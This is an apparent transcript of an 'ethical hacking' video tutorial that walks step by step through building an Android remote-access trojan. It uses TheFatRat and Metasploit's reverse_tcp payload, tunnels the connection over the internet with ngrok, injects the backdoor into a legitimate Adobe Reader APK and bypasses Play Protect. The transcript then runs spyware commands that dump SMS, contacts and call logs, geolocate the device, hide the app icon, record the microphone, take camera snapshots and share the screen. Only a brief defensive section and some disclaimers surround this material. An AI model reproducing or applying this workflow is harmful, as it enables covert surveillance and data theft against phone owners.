What if I told you that someone could be watching everything you do on your Android phone right now - your messages, your photos, your passwords, even listening through your microphone and watching through your camera? The scariest part? You'd never even know they were there. Welcome back to Tech Sky, your trusted source for ethical hacking and cybersecurity education. Today we're diving deep into one of the most dangerous threats to Android security: remote access exploitation. If you're new here and want to learn about cybersecurity and ethical hacking, make sure to subscribe and activate the notification bell. Your support helps us create more in-depth security content like this. The knowledge shared in this video is strictly for educational purposes and security research. Using these techniques without proper authorization isn't just unethical - it's illegal. All demonstrations are performed in a controlled lab environment using dedicated testing devices. We strongly condemn any malicious use of this knowledge. Our goal is to understand these threats to build better defenses. Let's understand why Android devices are such attractive targets for attackers. There are over three billion active Android devices worldwide. Each one is a powerful computer that contains its user's entire digital life: banking apps, social media, emails, photos - everything that matters is stored on these devices. But what makes Android particularly vulnerable is its open nature. Unlike other mobile operating systems, Android allows installation from unknown sources. While this flexibility is great for users, it also creates opportunities for attackers. Think about this: how many times have you installed an app from outside the Play Store? Maybe it was a game not available in your region or an app someone shared with you. Each time you do this, you're trusting that app with access to your digital life. Attackers exploit this trust - they create seemingly harmless apps: games, utilities, even security tools. But hidden inside these apps is code that creates a backdoor to your device. Once installed, these malicious apps can access your camera and microphone, read your messages and emails, steal your passwords and banking information, track your location, access your photos and files, even eavesdrop on your conversations. The most dangerous part? These apps can hide themselves, running silently in the background while harvesting your personal information. Today I'll show you exactly how these attacks work so you can better protect yourself and your devices. Let's move to our lab environment and see this in action. Now that we understand the basics, let's prepare our attack environment. We'll need two powerful tools: TheFatRat and ngrok. Let's start with TheFatRat. First, let's update our system. Open your terminal and type "sudo apt update". This command refreshes our package lists from the repositories, ensuring we have access to the latest versions of all tools. After that, run "sudo apt upgrade". This command actually installs these latest versions, keeping our system secure and compatible with new tools. Now for TheFatRat installation, open your browser and search for The FatRat GitHub. Click the first result from the Screetsec repository. This is the official repository, ensuring we're getting the legitimate tool. Copy the repository link from either the address bar or by clicking the code button. Back in our terminal, let's clone this repository. Type "git clone" and paste the URL we just copied. While this clones, let me explain what makes TheFatRat special. It's an exploitation framework that automates the creation of backdoors and payloads. What sets it apart is its ability to create sophisticated payloads that can evade antivirus detection, making it both powerful and dangerous in the wrong hands. Once cloning is complete, navigate into the repository with "cd TheFatRat". Run "ls" to see the contents. Notice that setup.sh file? That's our installer. But first, we need to make it executable. Run "chmod +x setup.sh". This command gives the file execution permissions. We'll need root privileges for installation, so run "sudo" and enter your Kali Linux password. Now run "./setup.sh" to start the installation. Watch how it checks for all necessary modules. If you see a prompt about an incorrect version of metasploit, type "yes" to install the correct version. The installation process is thorough - it's checking every required tool and marking them with either a check for installed or a cross for missing. Don't worry about the missing ones - it will install them automatically. Just sit back and let it work. When prompted about the backdoor Factory, choose option two for automatic installation. Next, it will ask for a folder path to save your generated payloads. While you could use the default path, let's make it more accessible. Open a new terminal in your Documents folder, run "pwd" to get the complete path, copy it and paste it back in TheFatRat's terminal. When asked if you want to run TheFatRat from anywhere using the "fatrat" command, type "Y" and press enter. This makes the tool easily accessible from any directory. To verify our installation, make sure you're still in root privileges and type "fatrat". Watch as it performs one final module check. Press enter when prompted and wait while it starts the PostgreSQL service. Press enter again at the next prompt, and there we have it - TheFatRat's main menu with all its options. We'll explore these in detail, but first let's install our second crucial tool: ngrok. Before we move forward, let's understand what ngrok is and why we need it. ngrok is a powerful tunneling tool that creates secure tunnels to your localhost, making it accessible from the internet. For our demonstration, we'll use it to create a connection back to our system. Let's install ngrok. Open your browser and search for "ngrok Linux". Click the first result that says "Download ngrok". On the download page, you should see Linux selected as your operating system. On the left side, they provide a simple installation command. Copy it exactly as shown and paste it into your terminal. Once ngrok is installed, let's verify it. Type "ngrok help" in your terminal. This shows all available commands. Scroll down and you'll see some sample commands. Let's try the basic one: "ngrok http 80". Notice the error? ngrok is telling us we need to do two things: sign up for an account and configure our auth token. See those links in the error message? Let's handle them one by one. Hold Control and click the first link - this opens the ngrok signup page in your browser. Complete the signup process on your own. Once you've created your account, go back to the terminal and click the second link to get your auth token. To configure ngrok with your auth token, run "ngrok config add-authtoken" followed by your token. This links ngrok to your account. Let's test our setup. Run "ngrok http 80" again. See how it starts up without errors now? Perfect. But there's one more crucial step. For our demonstration, we'll be using TCP instead of HTTP. Try running "ngrok tcp 4444". You'll notice a different error - ngrok requires payment verification for TCP tunnels. Click the provided link. Similar to the signup process, you'll need to enter payment information, but don't worry - this is just for verification. ngrok won't charge you anything as we're using the free account. They require this verification because TCP tunnels can potentially be misused. After completing the payment verification, try "ngrok tcp 4444" again. Now it works perfectly! Our environment setup is complete - both TheFatRat and ngrok are ready for our demonstration. Now we're at the main menu of TheFatRat. Look at all these powerful options before us. We're interested in the first option: "Create backdoor with msfvenom". Type "1" and press enter. This brings us to a new menu with multiple options for different operating systems, programming languages, and frameworks. You can create payloads for Windows, Linux, PHP, and more, but today we're focusing on Android. Look at option 3: "Signed Android FatRat APK". Enter "3" and press enter. Now it's asking us to set LHOST IP. This is a crucial decision point - if you're performing this on your local network, you'd use your Kali Linux machine's local IP address. It's actually shown right above this prompt. But we're going beyond local testing - we want to demonstrate how this works over the internet. This is where ngrok comes in. Open the "ngrok tcp" terminal. Look at that address it generated - we need to copy everything after "tcp" up to the colon. This is what we'll use instead of a local IP. Copy it, switch back to TheFatRat, and paste it as our LHOST. Next, it's asking for LPORT. Again, for local network testing, you typically use port 4444 - this is the default port that Metasploit uses for many of its operations. But since we're using ngrok, we need to use the port it provided. Copy that number from your ngrok terminal and paste it here. Now it wants a name for our output file. You can name it anything - I'm calling mine "my- rat". Think of this name carefully - in real security testing, it should blend in with normal apps. Look at these payload options. We're using TCP, so we want option 3: "android/meterpreter/reverse_ tcp". This payload creates a persistent connection back to our machine through TCP, giving us powerful control capabilities. The payload creation process has started - this might take a few minutes. TheFatRat is not just creating the payload, it's also signing it to help bypass some security measures. Look at all these components being generated. Now it's asking if we want to create a resource file for the msfvenom listener. For now, enter "N" for no - we'll handle our listener setup manually to better understand the process. Press enter again to return to the menu. Let's verify our payload was created. Remember when we set up TheFatRat? We configured it to save files in Documents. Open that folder, and there it is - our "my-rat.apk" is waiting to be deployed. Now comes the critical part: getting this payload onto our target device. In a real security assessment, this would involve social engineering, but since we're in our testing environment with full permissions, we have options. We could use a USB cable, but let me show you a smarter method: creating a quick Python server. Right-click in the Documents folder and open Terminal here. We'll run a simple yet powerful command: "python3 -m http.server 90". Let me explain what this does: Python has a built-in HTTP server module. The "-m" flag tells Python to run this module, and we're specifying port 90. This creates a basic web server that shares all files in our current directory. Now switch to your testing device - this could be an Android emulator or a physical device dedicated to security testing. Open its browser and enter your Kali machine's IP address followed by ":90". See how it shows our directory contents? And there's our "my-rat.apk" waiting to be downloaded. Click on the APK. Notice that warning: "File can't be downloaded securely". It's showing two options: "Discard" or "Keep". This is Android's first line of defense against unknown applications. Click "Keep" - we're bypassing the security measure. After downloading, try to install it. Look at that prominent warning: "Google Play Protect - Unsafe app blocked". This is Google's security system doing its job, detecting potentially harmful applications. For our demonstration, click "More details" and then "Install anyway". In real world security, these warnings are crucial protections that help users avoid malicious apps. Once installed, don't open it yet - click "Done". We need to set up our listener first. Exit the Python server with "Control+C" - we don't need it anymore. Back in the TheFatRat terminal, let's return to the main menu. Type "15" and press enter. Look at Option 10: "Jump to MSF console". Type "10" and press enter. A new terminal window opens, launching the Metasploit Framework. This is where the real power comes in. Wait for it to fully load - you'll see the "msf6>" prompt. First, let's clear the screen for better visibility. Type "clear". Now we need to set up our handler with "use exploit/multi/handler". This module is crucial - it's what catches and manages our incoming connection. Think of it as setting up a specialized receiver for our payload. We need to configure the exact same payload we used in our APK. Type "set payload android/meterpreter/reverse_ tcp". To verify our configuration, type "show options". See how LPORT is already set to 4444? But look - LHOST is empty. We need to set it. Type "set LHOST 0.0.0.0". This tells Metasploit to listen on all network interfaces - this is important when working with external connections like we are. Now comes the moment of truth: switch to your Android device and open the app. It's asking for permissions - click "Continue". We want to grant these for our testing. You'll see another warning about the app being built for an older Android version - click "OK" to dismiss it. Back to our MSF console terminal, type "run" and watch. There it is - "Session established successfully"! We now have a complete connection to the Android device. Type "help" to see the full arsenal at our disposal. Look at all these commands! Let's test some of the most powerful ones. Type "sysinfo". Look what happens - it displays comprehensive system information about the target device. You can see the Android version, architecture details - everything an attacker would need to tailor their next move. Type "webcam_ list". This shows all available cameras on the device: front, back - any camera the device has access to. Try "dump_calllog". This command extracts the entire call history. Look into the TheFatRat folder - see how it saves everything there? This folder becomes a treasury of extracted information. Let's grab more data. Type "dump_contacts". It pulls the entire contact list. Then "dump_sms" to download all text messages. Want to know where the device is? Type "geolocate". This gives us the device's current location. Here's something particularly stealthy: type "hide_app_icon". Watch what happens on the device - the app icon disappears from the App Drawer. The application keeps running, but the user can't see it anymore. This is why malicious apps are so dangerous - they can hide their presence while maintaining full access. First of all, in our previous section we've seen how to generate a standalone malicious app and through that app how you can hack an Android phone, track device location, and hide it. But you noticed that the app was not looking like a normal or legitimate one. The name of that app was "Main Activity", which doesn't seem legitimate at all. So in this section, which will be the advanced part of that demonstration, we will discuss how to make a real-looking legitimate app into a malicious one. Let's begin with opening the terminal and gaining root privileges by typing "sudo su", then entering your password. After that, run the command "fatrat" and you can see TheFatRat is opening. Press enter and continue whenever it asks. Now we are on the main menu of TheFatRat. Here in the previous section, we selected the first option which is "Create backdoor with msfvenom", but in this video we will not use this option. Instead, we will use the fifth option which is "Backdooring Original APK". To use this, type "5" and press enter. Now you can see that it is asking to set the LHOST. In the previous section we used ngrok to work over the internet, but in this section we'll go with a simpler flow to explain the process. So copy the LHOST provided above and paste it here. Now it is asking for the LPORT. Type "4444" here and press enter. We're using this port because it's commonly available and not typically blocked by firewalls, making it ideal for establishing our connection. Now here is the main part - it is asking to provide the path for the legitimate app in which we will inject the payload. Be careful! I recommend you not use any app without permission. For demonstration and testing purposes only, use those apps that are provided for security testing and experiments. The question is, where do we find that app? It's not hard - TheFatRat provides some testing apps that you can use for testing purposes. Here we have to copy the path of the app in which we want to inject our payload. So open the Kali home folder and go to the TheFatRat directory. Here you can see a folder for APKs - open it. Now here we have two more folders - open the first folder, and here you can see two apps are available for testing purposes: first is Adobe Reader and second is WhatsApp. We will use Adobe Reader for our demonstration. To copy the path, you can right-click and copy the path from Properties, or you can first click the app and press F2 for the app name, copy it, and then paste it in front of the folder address. Now copy the complete address. When copied, go back to TheFatRat terminal and paste it here, then press enter. Now you can see that TheFatRat is testing the app to see if it's suitable for payload injection. When the test is completed, you can see it's showing different types of payloads that we can inject into the app. We will use reverse TCP to establish a connection back to our machine when the victim opens the app. To use it, enter "3" and click enter. Now it is showing three more options that are actually different methods for injecting the payload. First is "Use backdoor-apk 0.2.4a", which is a specialized tool for backdooring Android applications that preserves the original app's functionality. Second is "Use old TheFatRat method", which is a legacy approach that might work better on older Android versions. And third is "Use msf venom embedded method", which directly embeds our payload using the Metasploit Framework's tools. We will use the third one - enter "3" and press enter. Now the process is started, but here you can see an error occurred stating that APKTool 2.6.0 is installed but we need at least version 2.9.2. So let's set up our environment accordingly. If you don't face this error, you can skip this process. To download the correct version of APKTool, open your web browser and search for "APKTool". Here you can see the first official link, and below this there is an install guide mentioned. Click the link and you will be redirected to the install guide page. Scroll down to the Linux section and click to download the latest version of the APKTool. Now here you can see different versions, and we need at least 2.9.2. Click it to download it. After some time, it will be downloaded. Open the downloads folder and you can see it is here. Now open the /home/kali and the TheFatRat folder. In this, you can see the "tools" folder - open it, and inside it you can find the APKTool folder. Open it. Here you can see that three files are present. First is the APKTool wrapper - we don't need to do anything with it. Second is the APKTool old version - we need to replace it with the latest version. To do this, first of all delete this and copy the downloaded file and paste it here. Now click F2 to change the name and make it accordingly - remove the version part from the file and it will become "apktool.jar". Now we have to change the version file - open it and you can see "2.6.0" is written. Change it to "2.9.2", save it, and close it. Now open a new terminal and type the command "apktool -- version" and you can see that the updated version is here. Now here we need to install another tool which is "apksigner". This tool is used to sign the app files after modification, which is necessary for Android to recognize and install them. To install it, type the command "sudo apt install apksigner". Enter your Kali password and then type "y" to continue to install. Now everything is done and we will move to the TheFatRat process again. Now we're at the point where we previously faced the error. You can see the backdooring process has started. This will take some time. During this process, TheFatRat is decompiling the legitimate app, injecting our malicious code into it, and then recompiling everything while preserving the app's original functionality. This approach is more complex than creating a standalone malicious app because it needs to ensure the original app still works normally while our backdoor runs silently in the background. When the process completes, we'll return to the menu. Next, let's open the folder where TheFatRat saved the app file. In our previous section, we set the save location to the Documents folder, so let's check there. Open the Documents folder and you'll see a file named "backdoor.apk". This is our malicious app. Now we need to transfer it to our testing Android device. Let's repeat the same process we did in the previous section. Open a new terminal in the Documents folder and run the command "python3 -m http.server 90". Now open the browser on your testing device and enter the IP address of your Kali machine with port 90. You can see the backdoor app is available here - click it to download it. Open the downloads and tap on the file to install it. Click the install button. Once installation completes, click "Done". We'll open the app after setting up the msfvenom listener. Now that our malicious app is installed on the target device, we need to set up our listener to receive the connection when the app is opened. Let's open a new Kali Linux terminal and gain root privileges. Type "msfconsole" to launch the Metasploit framework. This might take a moment to load. Once Metasploit loads, we need to configure our handler. Type "use exploit/ multi/handler" and press enter. This module handles incoming connections from our payload. Next, we need to set our payload to match what we used in TheFatRat. Type "set payload android/meterpreter/reverse_tcp" and press enter. Let's check what options we need to configure. Type "show options" and press enter. You'll see that LHOST isn't set yet, but LPORT is already set to 4444, the same port we specified earlier. To set LHOST, type "set LHOST" followed by your Kali machine's IP address. Now comes the exciting part - type "run" and press enter. This starts our handler, which will wait for the target device to connect. Switch to your Android device and open the Adobe Reader app that we modified. Watch your Metasploit console closely - within moments, you should see a message indicating that a Meterpreter session has been established. This means we now have a connection to the target device. What makes this attack particularly dangerous is that the Adobe Reader app appears to function normally to the user - they can still use it to read PDFs while our back door is running silently in the background. Let's explore what we can do with this connection. First, at the Meterpreter prompt, type "sysinfo" and press enter. This command gives us detailed information about the compromised device, including its Android version, hardware details, and architecture. This is crucial information that attackers use to determine which exploits might work against the target device. Next, let's try one of the most invasive capabilities: audio recording. Type "record_mic -d 10" and press enter. This records 10 seconds of audio through the device's microphone and saves it to your attacking machine. The victim would have absolutely no indication that their conversations are being recorded. This could be used to capture sensitive discussions, personal conversations, or even passwords spoken aloud. Now let's check what cameras are available on the device. Type "webcam_list" and press enter. You'll see a list of available cameras on the device, typically both front and back cameras are listed. Each camera has an index number assigned to it. Let's take a photo using the front-facing camera without the victim knowing. Type "webcam_snap -i 2" and press enter. The number after "-i" specifies which camera to use - in this case camera index 2, which is typically the front camera. This captures a photo using the selected camera and saves it to your attacking machine. Think about the privacy implications of this - an attacker could secretly take photos of the victim or their surroundings. We can even capture what's on the screen. Type "screenshot" and press enter. This takes a screenshot of whatever is currently displayed on the victim's device and saves it to your machine. This could be used to capture sensitive information like banking details, private messages, or passwords. For continuous monitoring, we can use "screenshare", which gives us a live feed of the victim's screen. Type "screenshare" and press enter. Now you can see everything they're doing on their device in real time. We can also explore the complete file system of the device using basic Linux commands. You can access photos, documents, downloads, and other sensitive files stored on the victim's device. Now let me be very clear - all of these capabilities I've just demonstrated are why mobile security is so crucial. The fact that we've disguised our malicious code inside what appears to be a legitimate app makes this attack vector particularly dangerous. Most users wouldn't think twice about installing a PDF reader app, especially if it came from what appeared to be a legitimate source. Now that you understand how devastating these attacks can be, let's talk about protecting yourself and your devices. This isn't just theory - these are practical steps that could save your digital life. First and most crucial: never ever install apps from unknown sources. I know it's tempting when you find an app that's not on the Play Store, but this is exactly how attackers get in. That "Unknown Sources" toggle in your security settings? Think of it as the front door to your digital house - keep it locked! Google Play Protect isn't just annoying popups - it's your first line of defense. When you saw those warnings during our demonstration, that was Play Protect doing its job. Never bypass these warnings on your personal device - the few seconds it takes to find a legitimate app on the Play Store could save you from months of privacy nightmares. Keep your Android system updated - every security patch matters. Those update notifications you keep 0:29:26.680,0:29:32.720 postponing? Schedule them tonight. Attackers often exploit known vulnerabilities that are already patched in newer versions. Here's something many people overlook: check your installed apps regularly. Go to Settings, then Apps. Look for anything you don't remember installing. Pay special attention to apps with weird names or symbols you don't recognize. If something looks suspicious, remove it immediately. Watch your app permissions carefully - an app asking for permissions it shouldn't need is a massive red flag. Why would a calculator need access to your camera? Why does a game need to read your SMS messages? These unnecessary permissions are often how malicious apps maintain their control. Use a reliable mobile security solution - the built-in Play Protect is good, but additional security can provide extra layers of protection. Look for solutions that offer real-time scanning and app behavior monitoring. For the tech-savvy users, consider using an app like Network Monitor Mini. It shows you all active network connections on your device. If you see suspicious outbound connections, especially to unknown addresses, investigate immediately. Monitor your battery usage - malicious apps often drain battery by running constantly in the background. If your battery life suddenly decreases or your phone feels hot when you're not using it, check your battery usage statistics for suspicious activity. Here's a pro tip: use Android's built-in Safe Mode when you suspect something's wrong. Reboot your device while holding the power button, and you'll see an option for Safe Mode. This prevents third-party apps from running, making it easier to identify and remove malicious ones. For those interested in diving deeper into Android security, we'll be covering advanced protection techniques in our next videos exclusively for channel members. We'll explore custom security configurations, advanced monitoring tools, and professional-grade security hardening techniques. To join our membership, click the link above in the info icon. Remember, the knowledge we've shared today carries great responsibility - use it to protect yourself and others, never for malicious purposes. Understanding these attacks is crucial for defense, but implementing them without authorization is illegal and unethical. If you found this information valuable, smash that like button, subscribe, and hit the notification bell to stay updated with our latest security insights. Share this video with anyone you care about - knowledge is our best defense against cyber threats. This is Tech Sky, reminding you that in the vast tech landscape, security illuminates our path forward. Stay curious, stay ethical, and keep learning!